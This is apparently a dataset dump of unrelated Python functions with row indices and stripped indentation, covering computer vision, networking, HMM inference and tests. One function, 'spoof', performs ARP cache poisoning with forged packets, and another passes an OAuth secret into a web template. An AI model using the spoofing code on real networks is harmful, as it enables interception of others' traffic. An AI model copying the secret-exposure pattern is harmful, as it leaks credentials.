http://www.pyimagesearch.com/2015/03/09/capturing-mouse-click-events-with-python-and-opencv/
"""
# grab references to the global variables
global refPt, neg_refPt, positive_examples
if event == cv2.EVENT_LBUTTONUP:
# record the ending (x, y) coordinates and indicate that
# And draw a colored box around the click point.
if positive_examples:
refPt.append((x, y))
rect_color = (0, 255, 0)
else:
neg_refPt.append((x, y))
rect_color = (255, 0, 0)
# draw a rectangle around the region of interest
upleft_corner = (x - halfwin_side, y - halfwin_side)
lowright_corner = (x + halfwin_side, y + halfwin_side)
cv2.rectangle(image, upleft_corner, lowright_corner, rect_color, 2)
cv2.imshow("image", image) | 5,333,562 |
def edges_to_adj_list(edges):
"""
Transforms a set of edges in an adjacency list (represented as a dictiornary)
For UNDIRECTED graphs, i.e. if v2 in adj_list[v1], then v1 in adj_list[v2]
INPUT:
- edges : a set or list of edges
OUTPUT:
- adj_list: a dictionary with the vertices as keys, each with
a set of adjacent vertices.
"""
adj_list = {} # store in dictionary
for v1, v2 in edges:
if v1 in adj_list: # edge already in it
adj_list[v1].add(v2)
else:
adj_list[v1] = set([v2])
if v2 in adj_list: # edge already in it
adj_list[v2].add(v1)
else:
adj_list[v2] = set([v1])
return adj_list | 5,333,563 |
def _get_lookups(
name: str,
project: interface.Project,
base: Optional[str] = None) -> list[str]:
"""[summary]
Args:
name (str): [description]
design (Optional[str]): [description]
kind (Optional[str]): [description]
Returns:
list[str]: [description]
"""
lookups = [name]
if name in project.outline.designs:
lookups.append(project.outline.designs[name])
if name in project.outline.kinds:
lookups.append(project.outline.kinds[name])
if base is not None:
lookups.append(base)
return lookups | 5,333,564 |
def _assign_id(obj, seen_objs, obj_by_id, attr='_id', seen_obj=None):
"""Assign a unique ID to obj, and track all ids in obj_by_id."""
if seen_obj is None:
seen_obj = obj
if seen_obj not in seen_objs:
if not hasattr(obj, attr):
obj_by_id.append(obj)
setattr(obj, attr, len(obj_by_id))
seen_objs[seen_obj] = getattr(obj, attr)
else:
setattr(obj, attr, seen_objs[seen_obj]) | 5,333,565 |
def unwrap(value):
"""
Unwraps the given Document or DocumentList as applicable.
"""
if isinstance(value, Document):
return value.to_dict()
elif isinstance(value, DocumentList):
return value.to_list()
else:
return value | 5,333,566 |
def home_all():
"""Home page view.
On this page a summary campaign manager view will shown with all campaigns.
"""
context = dict(
oauth_consumer_key=OAUTH_CONSUMER_KEY,
oauth_secret=OAUTH_SECRET,
all=True,
map_provider=map_provider()
)
# noinspection PyUnresolvedReferences
return render_template('index.html', **context) | 5,333,567 |
def _sqrt(x):
"""_sqrt."""
isnumpy = isinstance(x, np.ndarray)
isscalar = np.isscalar(x)
return np.sqrt(x) if isnumpy else math.sqrt(x) if isscalar else x.sqrt() | 5,333,568 |
def cli_make_release_metadata(raw_metadata):
"""Make a data packet suitable for release."""
raw_meta = pd.read_csv(raw_metadata, dtype=str)
meta, cntrl_meta, dupe_meta, dupe_map = clean_metadata_table(raw_meta)
meta.to_csv('release_metadata.csv')
cntrl_meta.to_csv('control_metadata.csv')
dupe_meta.to_csv('duplicate_metadata.csv')
dupe_map.to_csv('duplicate_map.csv') | 5,333,569 |
def update_subnet(context, id, subnet):
"""Update values of a subnet.
: param context: neutron api request context
: param id: UUID representing the subnet to update.
: param subnet: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for 'allow_put'
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py.
"""
LOG.info("update_subnet %s for tenant %s" %
(id, context.tenant_id))
with context.session.begin():
subnet_db = db_api.subnet_find(context, id=id, scope=db_api.ONE)
if not subnet_db:
raise exceptions.SubnetNotFound(id=id)
s = subnet["subnet"]
always_pop = ["_cidr", "cidr", "first_ip", "last_ip", "ip_version",
"segment_id", "network_id"]
admin_only = ["do_not_use", "created_at", "tenant_id",
"next_auto_assign_ip", "enable_dhcp"]
utils.filter_body(context, s, admin_only, always_pop)
dns_ips = utils.pop_param(s, "dns_nameservers", [])
host_routes = utils.pop_param(s, "host_routes", [])
gateway_ip = utils.pop_param(s, "gateway_ip", None)
allocation_pools = utils.pop_param(s, "allocation_pools", None)
if not CONF.QUARK.allow_allocation_pool_update:
if allocation_pools:
raise exceptions.BadRequest(
resource="subnets",
msg="Allocation pools cannot be updated.")
alloc_pools = allocation_pool.AllocationPools(
subnet_db["cidr"],
policies=models.IPPolicy.get_ip_policy_cidrs(subnet_db))
else:
alloc_pools = allocation_pool.AllocationPools(subnet_db["cidr"],
allocation_pools)
if gateway_ip:
alloc_pools.validate_gateway_excluded(gateway_ip)
default_route = None
for route in host_routes:
netaddr_route = netaddr.IPNetwork(route["destination"])
if netaddr_route.value == routes.DEFAULT_ROUTE.value:
default_route = route
break
if default_route is None:
route_model = db_api.route_find(
context, cidr=str(routes.DEFAULT_ROUTE), subnet_id=id,
scope=db_api.ONE)
if route_model:
db_api.route_update(context, route_model,
gateway=gateway_ip)
else:
db_api.route_create(context,
cidr=str(routes.DEFAULT_ROUTE),
gateway=gateway_ip, subnet_id=id)
if dns_ips:
subnet_db["dns_nameservers"] = []
for dns_ip in dns_ips:
subnet_db["dns_nameservers"].append(db_api.dns_create(
context,
ip=netaddr.IPAddress(dns_ip)))
if host_routes:
subnet_db["routes"] = []
for route in host_routes:
subnet_db["routes"].append(db_api.route_create(
context, cidr=route["destination"], gateway=route["nexthop"]))
if CONF.QUARK.allow_allocation_pool_update:
if isinstance(allocation_pools, list):
cidrs = alloc_pools.get_policy_cidrs()
ip_policies.ensure_default_policy(cidrs, [subnet_db])
subnet_db["ip_policy"] = db_api.ip_policy_update(
context, subnet_db["ip_policy"], exclude=cidrs)
subnet = db_api.subnet_update(context, subnet_db, **s)
return v._make_subnet_dict(subnet) | 5,333,570 |
def run_system(
main: Callable,
args: Optional[Tuple] = None,
kwargs: Optional[Dict] = None,
requirements: Optional[List[str]] = None,
startup: Optional[Callable] = None,
cleanup: Optional[Callable] = None,
keyboard_interrupt: Optional[Callable] = None,
sys_exit: Optional[Callable] = None,
restart_when_error: bool = False,
error_log: Optional[Union[str, Path]] = None
) -> None:
"""
Run the system.
:param main: the main function of the system.
:param args: the arguments for the main function.
:param kwargs: the keyword arguments for the main function.
:param requirements: the requirements of this system.
When the ImportError or ModuleNotFoundError occurred,
system will try install the requirements use pip command, and try import module again.
:param startup: this function will be called before the main function.
:param cleanup: the function will be called when the process exits.
:param keyboard_interrupt: this function will be called when the KeyboardInterrupt occurred.
:param sys_exit: this function will be called when the SystemExit occurred.
:param restart_when_error: when some error occurred, try restart the main function.
:param error_log: when the unknown error occurred. try save the error log to this file.
"""
def __run_main(args_, kwargs_):
if args_ is not None and kwargs_ is not None:
main(*args_, **kwargs_)
elif args_ is not None:
main(*args_)
elif kwargs_ is not None:
main(**kwargs_)
else:
main()
try:
# startup
if startup is not None:
startup()
# main
__run_main(args, kwargs)
# add cleanup signal handler.
if cleanup is not None:
def sig_handler(signum, frame) -> None:
cleanup()
exit(1)
signal(SIGTERM, sig_handler)
except (ImportError, ModuleNotFoundError):
if requirements is not None:
install_modules(requirements)
# try restart system.
run_system(main, args, kwargs, requirements, startup, cleanup, keyboard_interrupt, sys_exit, restart_when_error)
except KeyboardInterrupt:
if keyboard_interrupt is not None:
keyboard_interrupt()
except SystemExit:
if sys_exit is not None:
sys_exit()
except Exception as error:
# if unknown error occurred and the `restart_when_error` is True. Try restart the system.
print(f'Some unknown error occurred. Try restart. <Exception: {error}>')
print_exc()
if error_log is not None:
try:
with open(str(error_log), mode='w', encoding=ENCODING) as f:
f.write(format_exc())
except Exception as e:
print(f"Can't save the error log to file. <Exception: {e}>")
print_exc()
if restart_when_error:
run_system(
main, args, kwargs, requirements, startup, cleanup, keyboard_interrupt, sys_exit, restart_when_error
)
finally:
# cleanup
if cleanup is not None:
signal(SIGTERM, SIG_IGN)
signal(SIGINT, SIG_IGN)
cleanup()
signal(SIGTERM, SIG_DFL)
signal(SIGINT, SIG_DFL) | 5,333,571 |
def validate_params():
"""@rtype bool"""
def validate_single_param(param_name, required_type):
"""@rtype bool"""
inner_result = True
if not rospy.has_param(param_name):
rospy.logfatal('Parameter {} is not defined but needed'.format(param_name))
inner_result = False
else:
if type(required_type) is list and len(required_type) > 0:
if type(rospy.get_param(param_name)) in required_type:
rospy.logfatal('Parameter {} is not any of type {}'.format(param_name, required_type))
inner_result = False
else:
if type(rospy.get_param(param_name)) is not required_type:
rospy.logfatal('Parameter {} is not of type {}'.format(param_name, required_type))
inner_result = False
return inner_result
result = True
result = result and validate_single_param('~update_frequency', int)
result = result and validate_single_param('~do_cpu', bool)
result = result and validate_single_param('~do_memory', bool)
result = result and validate_single_param('~do_network', bool)
return result | 5,333,572 |
def run_test_general_base_retrieval_methods(query_dic, query_types, trec_cast_eval, similarity, string_params,
searcher: SimpleSearcher, reranker,
write_to_trec_eval, write_results_to_file, reranker_query_config,
reranking_threshold, use_rrf):
"""
Run topics in trec_cast_eval
query_dic is a dict with string keys and a QueryConfig object
query_types is a list of strings that denote keys we want to use that are in query_dic
trec_cast_eval - object of type ConvSearchEvaluationGeneral
If write_to_trec_eval writes the results in trec eval format
If write_results_to_file writes the results in tsv format (including the
query and document's content for later use)
"""
metric_results = {}
doc_results = {}
for query_type in query_types:
print(similarity + " " + query_type + " " + string_params)
current_key = similarity + "_" + query_type + "_" + string_params
metric_results[current_key], _, doc_results[current_key] = \
run_topics_general(trec_cast_eval=trec_cast_eval,
query_config=query_dic[query_type], searcher=searcher,
reranker=reranker,
reranker_query_config=reranker_query_config,
reranking_threshold=reranking_threshold,
use_rrf=use_rrf)
index_name = os.path.basename(os.path.normpath(searcher.index_dir))
run_file_name = index_name + "_" + current_key
run_name = query_type
if searcher.is_using_rm3():
run_file_name += "_rm3"
if reranker:
run_file_name += "_" + reranker.RERANKER_TYPE + "_" + str(reranking_threshold)
run_name += "_" + reranker.RERANKER_TYPE + "_" + str(reranking_threshold)
if write_to_trec_eval:
write_trec_results(file_name=run_file_name, result=doc_results[current_key],
run_name=run_name)
if write_results_to_file:
write_doc_results_to_file(file_name=run_file_name + ".tsv", result=doc_results[current_key])
return metric_results, doc_results | 5,333,573 |
def user_exists(username):
"""Return True if the username exists, or False if it doesn't."""
try:
adobe_api.AdobeAPIObject(username)
except adobe_api.AdobeAPINoUserException:
return False
return True | 5,333,574 |
def bags_containing_bag(bag: str, rules: dict[str, list]) -> int:
"""Returns the bags that have bag in their rules."""
return {r_bag
for r_bag, r_rule in rules.items()
for _, r_color in r_rule
if bag in r_color} | 5,333,575 |
def default_mutable_arguments():
"""Explore default mutable arguments, which are a dangerous game in themselves.
Why do mutable default arguments suffer from this apparent problem? A function's
default values are evaluated at the point of function definition in the defining
scope. In particular, we can examine these bindings by printing
append_twice.__defaults__ after append_twice has been defined. For this function,
we have
print(append_twice.__defaults__) # ([],)
If a binding for `lst` is not supplied, then the `lst` name inside append_twice
falls back to the array object that lives inside append_twice.__defaults__.
In particular, if we update `lst` in place during one function call, we have changed
the value of the default argument. That is,
print(append_twice.__defaults__) # ([], )
append_twice(1)
print(append_twice.__defaults__) # ([1, 1], )
append_twice(2)
print(append_twice.__defaults__) # ([1, 1, 2, 2], )
In each case where a user-supplied binding for `lst is not given, we modify the
single (mutable) default value, which leads to this crazy behavior.
"""
def append_twice(a, lst=[]):
"""Append a value to a list twice."""
lst.append(a)
lst.append(a)
return lst
print(append_twice(1, lst=[4])) # => [4, 1, 1]
print(append_twice(11, lst=[2, 3, 5, 7])) # => [2, 3, 5, 7, 11, 11]
print(append_twice(1)) # => [1, 1]
print(append_twice(2)) # => [1, 1, 2, 2]
print(append_twice(3)) | 5,333,576 |
def is_text_file(file_):
"""
detect if file is of type text
:param file_: file to be tested
:returns: `bool` of whether the file is text
"""
with open(file_, 'rb') as ff:
data = ff.read(1024)
return not is_binary_string(data) | 5,333,577 |
def soft_update_datetime_field(
model_inst: models.Model,
field_name: str,
warehouse_field_value: Union[datetime, None],
) -> List[str]:
"""
Uses Django ORM to update DateTime field of model instance if the field value is null and the warehouse data is non-null.
"""
model_name: str = model_inst.__class__.__name__
current_field_value: Union[datetime, None] = getattr(model_inst, field_name)
# Skipping update if the field already has a value, provided by a previous cron run or administrator
if current_field_value is not None:
logger.info(
f'Skipped update of {field_name} for {model_name} instance ({model_inst.id}); existing value was found')
else:
if warehouse_field_value:
warehouse_field_value = warehouse_field_value.replace(tzinfo=pytz.UTC)
setattr(model_inst, field_name, warehouse_field_value)
logger.info(f'Updated {field_name} for {model_name} instance ({model_inst.id})')
return [field_name]
return [] | 5,333,578 |
def plot_confusion_matrix(
y_true,
y_pred,
normalize=False,
cmap=plt.cm.Blues,
label_list = None,
visible=True,
savepath=None):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
cm = confusion_matrix(y_true, y_pred)
acc = accuracy_score(y_true, y_pred)
f1 = f1_score(y_true, y_pred, average="micro")
title = f"Confusion Matrix, Acc: {acc:.2f}, F1: {f1:.2f}"
if label_list == None:
classes = range(0, max(y_true))
else:
classes = label_list
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
plt.figure(figsize=(13,13))
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
if savepath is not None:
plt.savefig(savepath)
if visible:
plt.show()
return acc, f1 | 5,333,579 |
def test_budget_get_nonexistent(base_data, client):
"""The status code is 404 when the budget does not exist"""
user, token, base_budget_list = base_data
response = client.get('/budgets/22968743-5e64-481d-a5d7-8cb46df035e5', headers={
'Authorization': f'bearer {token}'
})
assert response.status_code == 404 | 5,333,580 |
def _test_pressure_reconstruction(self, g, recon_p, point_val, point_coo):
"""
Testing pressure reconstruction. This function uses the reconstructed
pressure local polynomial and perform an evaluation at the Lagrangian
points, and checks if the those values are equal to the point_val array.
Parameters
----------
g : PorePy object
Grid.
recon_p : NumPy nd-Array
Reconstructed pressure polynomial.
point_val : NumPy nd-Array
Pressure avlues at the Lagrangian nodes.
point_coo : NumPy array
Coordinates at the Lagrangian nodes.
Returns
-------
None.
"""
def assert_reconp(eval_poly, point_val):
np.testing.assert_allclose(
eval_poly,
point_val,
rtol=1e-6,
atol=1e-3,
err_msg="Pressure reconstruction has failed"
)
eval_poly = utils.eval_P1(recon_p, point_coo)
assert_reconp(eval_poly, point_val)
return None | 5,333,581 |
def main():
""" Main
"""
generate_recipes(5) | 5,333,582 |
def logout():
"""Logout
:return: Function used to log out the current user
"""
logout_user()
return redirect(url_for('index')) | 5,333,583 |
def get_authorization_url(
app_id, redirect_uri, scope='all', state='', extra_data='', **params):
"""
Get the url to start the first leg of OAuth flow.
Refer to `Authentication Docs <https://developers.kloudless.com/docs/latest/
authentication#oauth-2.0>`_ for more information.
:param str app_id: Application ID
:param str redirect_uri: Redirect URI to your application server
:param str scope: A space-delimited string of scopes that indicate which
services a user can connect, and which permissions to request
:param str state: An arbitrary string which would be redirected back via
``redirect_uri`` as query parameter. Random url-safe Base64 string would
be generated by default
:param str extra_data: A URL-encoded JSON object containing data used to
pre-fill default values for fields in the Kloudless authentication
forms. For example, the domain of a WebDAV server
:param params: Additional query parameters
:returns: `tuple(url, state)`: Redirect the user to ``url`` to start
authorization. Saved ``state`` in user's session for future validation
:rtype: `tuple(str, str)`
"""
if extra_data and isinstance(extra_data, dict):
extra_data = json.dumps(extra_data)
if not state:
state = base64.urlsafe_b64encode(os.urandom(12)).decode('utf8')
params.update({
'client_id': app_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': scope,
'state': state,
'extra_data': extra_data,
})
endpoint = construct_kloudless_endpoint('oauth',
api_version=OAUTH_API_VERSION)
url = requests.Request('GET', endpoint, params=params).prepare().url
return url, state | 5,333,584 |
def poolmanager_get_pool_group(args):
"""
Get information about a poolgroup. Requires admin role.
"""
LOGGER.debug('args: %s' % str(args))
with get_client(args) as dcache:
response = dcache.poolmanager.get_pool_group(**vars(args))
print_response(response) | 5,333,585 |
def runMultiQueryBatch(scenario, queries, xmldb='', queryPath=None, outputDir=None,
miLogFile=None, regions=None, regionMap=None, rewriteParser=None,
batchFileIn=None, batchFileOut=None, noRun=False, noDelete=False):
"""
Create a single GCAM XML batch file that runs multiple queries, placing the
each query's results in a file named of the form {queryName}-{scenario}.csv.
:param scenario: (str) the name of the scenario to perform the query on
:param queries: (list of str query names and/or Query instances)
:param xmldb: (str) path to XMLDB, or '' to use in-memory DB
:param queryPath: (str) a list of directories or XML filenames, separated
by a colon (on Unix) or a semi-colon (on Windows)
:param outputDir: (str) the directory in which to write the .CSV
with query results, default is value of GCAM.OutputDir.
:param regions: (iterable of str) the regions you want to include in the query
:param regionMap: (dict-like) keys are the names of regions that should be rewritten.
The value is the name of the aggregate region to map into.
:param rewriteParser: (RewriteSetParser instance) parsed representation of
rewriteSets.xml
:param batchFileIn: (str) the name of a pre-formed batch file to run
:param batchFileOut: (str) where to write output from batchFileIn, if given
:param noRun: (bool) if True, print the command that would be executed, but
don't run it.
:param noDelete: (bool) if True, temporary files created by this function are
not deleted (use for debugging)
:return: none
"""
batchFile = createBatchFile(scenario, queries, xmldb=xmldb, queryPath=queryPath,
outputDir=outputDir, regions=regions, regionMap=regionMap,
rewriteParser=rewriteParser, noDelete=noDelete,
batchFileIn=batchFileIn, batchFileOut=batchFileOut)
runModelInterface(scenario, outputDir, xmldb=xmldb, batchFile=batchFile,
miLogFile=miLogFile, noDelete=noDelete, noRun=noRun) | 5,333,586 |
def get_user_messages(user, index=0, number=0):
"""
返回指定user按时间倒序的从index索引开始的number个message
"""
if not user or user.is_anonymous or index < 0 or number < 0:
return tuple()
# noinspection PyBroadException
try:
if index == 0 and number == 0:
all_message = user.messages.all()
else:
all_message = user.messages.all()[index:index+number]
except Exception as e:
all_message = tuple()
return all_message | 5,333,587 |
def third_party_apps_default_dc_modules_and_settings(klass):
"""
Decorator for DefaultDcSettingsSerializer class.
Updates modules and settings fields defined in installed third party apps.
"""
logger.info('Loading third party apps DEFAULT DC modules and settings.')
for third_party_app, app_dc_settings in get_third_party_apps_serializer_settings():
try:
app_dc_settings.DEFAULT_DC_MODULES
except AttributeError:
logger.info('Skipping app: %s does not have any DEFAULT DC modules defined.', third_party_app)
else:
_update_serializer_modules(third_party_app, app_dc_settings.DEFAULT_DC_MODULES, klass, default_dc=True)
try:
app_dc_settings.DEFAULT_DC_SETTINGS
except AttributeError:
logger.info('Skipping app: %s does not have any DEFAULT DC settings defined.', third_party_app)
else:
_update_serializer_settings(third_party_app, app_dc_settings, klass, default_dc=True)
return klass | 5,333,588 |
def test_nonlocals_set(nonlocals):
"""Test setting attribute through setatttr and setitem.
"""
nonlocals.attribute1 = 3
assert nonlocals.attribute1 == 3
nonlocals['attribute1'] = 4
assert nonlocals.attribute1 == 4
nonlocals.prop2 = 3
assert nonlocals.prop2 == 3
nonlocals['prop2'] = 4
assert nonlocals.prop2 == 4
nonlocals.top = 1
assert nonlocals.top == 1
nonlocals.write_only = 1
del nonlocals.attribute1
assert nonlocals.attribute1 == 1
with pytest.raises(AttributeError):
nonlocals.prop1 = 1
with pytest.raises(AttributeError):
del nonlocals.unknown
# write in the absence of an instance dict
del nonlocals.owner.__dict__
nonlocals.attribute1 = 3
assert nonlocals.attribute1 == 3
with pytest.raises(TypeError):
nonlocals[1] = 1
# Test setting a non-data descriptor
nonlocals.owner = 1
assert nonlocals.owner == 1 | 5,333,589 |
def split_lvis(
n_experiences: int,
train_transform=None,
eval_transform=None,
shuffle=True,
root_path: Union[str, Path] = None,
):
"""
Creates the example Split LVIS benchmark.
This is a toy benchmark created only to show how a detection benchmark can
be created. It was not meant to be used for research purposes!
:param n_experiences: The number of train experiences to create.
:param train_transform: The train transformation.
:param eval_transform: The eval transformation.
:param shuffle: If True, the dataset will be split randomly
:param root_path: The root path of the dataset. Defaults to None,
which means that the default path will be used.
:return: A :class:`DetectionScenario` instance.
"""
train_dataset = LvisDataset(root=root_path, train=True)
val_dataset = LvisDataset(root=root_path, train=False)
all_cat_ids = set(train_dataset.lvis_api.get_cat_ids())
all_cat_ids.union(val_dataset.lvis_api.get_cat_ids())
return split_detection_benchmark(
n_experiences=n_experiences,
train_dataset=train_dataset,
test_dataset=val_dataset,
n_classes=len(all_cat_ids),
train_transform=train_transform,
eval_transform=eval_transform,
shuffle=shuffle,
) | 5,333,590 |
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs `target_ip` saying that we are `host_ip`.
it is accomplished by changing the ARP cache of the target (poisoning)
"""
target_mac = get_mac(target_ip) # get the mac address of the target
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at') # craft the arp 'is-at' operation packet, hwsrc = sender mac
send(arp_response, verbose=0) # send packet
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac)) | 5,333,591 |
def compute_log_ksi_normalized(log_edge_pot, #'(t-1,t)',
log_node_pot, # '(t, label)',
T,
n_labels,
log_alpha,
log_beta,
temp_array_1,
temp_array_2):
""" to obtain the two-slice posterior marginals p(y_t = i, y_t+1 = j| X_1:T) = normalized ksi_t,t+1(i,j) """
# in the following, will index log_ksi only with t, to stand for log_ksi[t,t+1]. including i,j: log_ksi[t,i,j]
log_alpha = compute_log_alpha(log_edge_pot, log_node_pot, T, n_labels, log_alpha, temp_array_1, temp_array_2)
log_beta = compute_log_beta(log_edge_pot, log_node_pot, T, n_labels, log_beta, temp_array_1, temp_array_2)
log_ksi = np.empty((T-1, n_labels, n_labels))
for t in range(T-1):
psi_had_beta = log_node_pot[t+1,:] + log_beta[t+1, :] # represents psi_t+1 \hadamard beta_t+1 in MLAPP eq 17.67
log_ksi[t,:,:] = log_edge_pot
for c in range(n_labels):
for d in range(n_labels):
log_ksi[t,c,d] += log_alpha[t,d] + psi_had_beta[c]
# normalize current ksi[t,:,:] over both dimensions. This is not required of ksi, strictly speaking, but the output of the function needs to be normalized, and it's cheaper to do it in-place on ksi than to create a fresh variable to hold the normalized values
log_ksi[t,:,:] -= lse_numba_2d(log_ksi[t,:,:])
return log_ksi | 5,333,592 |
def flushcache():
"""
CLI: Delete all cached data (if cache is activated)
Usage: "flask flushcache"
"""
if read_config("CACHE"):
echo("Cache successfully flushed")
CACHE.clear()
else:
echo("Cache inactive, unable to flush") | 5,333,593 |
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description="Map gleason data to standard format.")
parser.add_argument("-d", "--data_path", type=Path, help="Path to folder with the data.", required=True)
parser.add_argument("-n", "--n_jobs", type=int, help="Number of jobs to run in parallel.", required=True)
return parser.parse_args() | 5,333,594 |
def test_whitepaper_model():
"""Tests the whitepaper 'measurement' model - generation
of ASL data using the DRO, then quantification using the
white paper equation"""
asldro_params = {
"lambda_blood_brain": 0.9,
"t1_arterial_blood": 1.65,
"label_efficiency": 0.85,
"asl_context": "m0scan control label control label control label control label",
"desired_snr": 1e10,
"acq_matrix": [64, 64, 20],
"label_duration": 1.8,
"signal_time": 3.6,
"perfusion_rate": {
"scale": 1.0,
},
"ground_truth": "hrgt_icbm_2009a_nls_3t",
}
quant_params = {
"label_type": "pcasl",
"model": "whitepaper",
"label_duration": 1.8,
"post_label_delay": asldro_params["signal_time"]
- asldro_params["label_duration"],
"label_efficiency": 0.85,
"lambda_blood_brain": 0.9,
"t1_arterial_blood": 1.65,
}
results = whitepaper_model(asldro_params, quant_params) | 5,333,595 |
def process_file(filename, f, num=float('Inf')):
"""read the given filename and extract information;
for each film, call f() with string arguments:
actor, date, title, role """
fp = open_gunzip(filename)
i = 0
# skip over the header until you get to the following magic line
for line in fp:
if line.strip() == '---- ------':
break
# regexp to recognize actor, tabs, movie
split1 = re.compile('([^\t]*)\t*(.*)', re.UNICODE)
# regexp to recognize title, date, role
split2 = re.compile('([^\(]*)\s*(\([^\)]*\))[^\[]*(\[[^\]]*\])?',
re.UNICODE)
# regexp to recognize television (TV), video (V), video game (VG)
video = re.compile('\(T?V|VG\)', re.U)
actor = ''
for line in fp:
line = line.rstrip()
if line == '': continue
if line[0] == '-----': break
# split the line into actor info and movie info;
# keep track of the current actor
ro = split1.match(line)
if ro:
new_actor, info = ro.groups()
if new_actor:
actor = new_actor
else:
print 'BAD1', line
continue
# skip television shows (titles in quotation marks)
if info[0] == '"':
continue
# skip made for TV and straight to video
if video.search(info):
continue
# split the info into title, date and role
ro = split2.match(info)
if ro:
title, date, role = ro.groups()
if date == None:
print 'BAD2', line
continue
f(actor, date, title, role)
i += 1
if i > num: break
else:
print 'BAD3', line
continue
stat = fp.close() | 5,333,596 |
def _deserialize_union(x: Any, field_type: Type) -> Any:
"""Deserialize values for Union typed fields
Args:
x (Any): value to be deserialized.
field_type (Type): field type.
Returns:
[Any]: desrialized value.
"""
for arg in field_type.__args__:
# stop after first matching type in Union
try:
x = _deserialize(x, arg)
break
except ValueError:
pass
return x | 5,333,597 |
def read_simplest_expandable(expparams, config):
"""
Read expandable parameters from config file of the type `param_1`.
Parameters
----------
expparams : dict, dict.keys, set, or alike
The parameter names that should be considered as expandable.
Usually, this is a module subdictionary of `type_simplest_ep`.
config : dict, dict.keys, set, or alike
The user configuration file.
Returns
-------
set of str
The parameters in `config` that comply with `expparams`.
"""
new = set()
for param in config:
try:
name, idx = param.split("_")
except ValueError:
continue
if idx.isdigit() and name in expparams:
new.add(param)
return new | 5,333,598 |
def rec_map_reduce_array_container(
reduce_func: Callable[[Iterable[Any]], Any],
map_func: Callable[[Any], Any],
ary: ArrayOrContainerT) -> "DeviceArray":
"""Perform a map-reduce over array containers recursively.
:param reduce_func: callable used to reduce over the components of *ary*
(and those of its sub-containers) if *ary* is a
:class:`~arraycontext.ArrayContainer`. Must be associative.
:param map_func: callable used to map a single array of type
:class:`arraycontext.ArrayContext.array_types`. Returns an array of the
same type or a scalar.
.. note::
The traversal order is unspecified. *reduce_func* must be associative in
order to guarantee a sensible result. This is because *reduce_func* may be
called on subsets of the component arrays, and then again (potentially
multiple times) on the results. As an example, consider a container made up
of two sub-containers, *subcontainer0* and *subcontainer1*, that each
contain two component arrays, *array0* and *array1*. The same result must be
computed whether traversing recursively::
reduce_func([
reduce_func([
map_func(subcontainer0.array0),
map_func(subcontainer0.array1)]),
reduce_func([
map_func(subcontainer1.array0),
map_func(subcontainer1.array1)])])
reducing all of the arrays at once::
reduce_func([
map_func(subcontainer0.array0),
map_func(subcontainer0.array1),
map_func(subcontainer1.array0),
map_func(subcontainer1.array1)])
or any other such traversal.
"""
def rec(_ary: ArrayOrContainerT) -> ArrayOrContainerT:
try:
iterable = serialize_container(_ary)
except NotAnArrayContainerError:
return map_func(_ary)
else:
return reduce_func([
rec(subary) for _, subary in iterable
])
return rec(ary) | 5,333,599 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.